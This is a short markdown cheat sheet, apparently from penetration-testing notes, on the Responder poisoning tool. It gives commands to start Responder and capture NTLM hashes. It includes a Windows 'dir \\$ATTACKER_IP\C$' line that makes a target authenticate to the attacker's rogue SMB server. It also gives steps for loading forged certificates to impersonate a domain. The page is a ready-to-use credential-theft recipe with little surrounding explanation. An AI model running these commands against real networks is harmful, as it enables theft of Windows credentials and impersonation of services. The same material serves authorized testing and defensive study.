41 lines
883 B
Markdown
41 lines
883 B
Markdown
# Responder
|
|
|
|
* [lgandx's repo](https://github.com/lgandx/Responder.git)
|
|
|
|
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
|
|
|
|
## Usage
|
|
|
|
### Grab NTLM Token
|
|
|
|
* Setup responder
|
|
```sh
|
|
responder -I tun0 -wrvd
|
|
```
|
|
|
|
* Open an Shell on the windows target and request the attacker's SMB a.k.a responder
|
|
```sh
|
|
dir \\$ATTACKER_IP\C$
|
|
```
|
|
|
|
|
|
### Impersonate Domain -- Change Responder's certificates
|
|
|
|
* After using nsupdate to add the attacker as a subdomain do the following tasks
|
|
* Add a certificate and its private key to
|
|
```sh
|
|
/usr/share/responder/certs
|
|
```
|
|
* Edit `Responder.conf`
|
|
```
|
|
[HTTPS Server]
|
|
|
|
; Configure SSL Certificates to use
|
|
SSLCert = certs/cert.pem
|
|
SSLKey = certs/key.pem
|
|
```
|
|
* Start responder
|
|
```sh
|
|
responder -I <interface>
|
|
```
|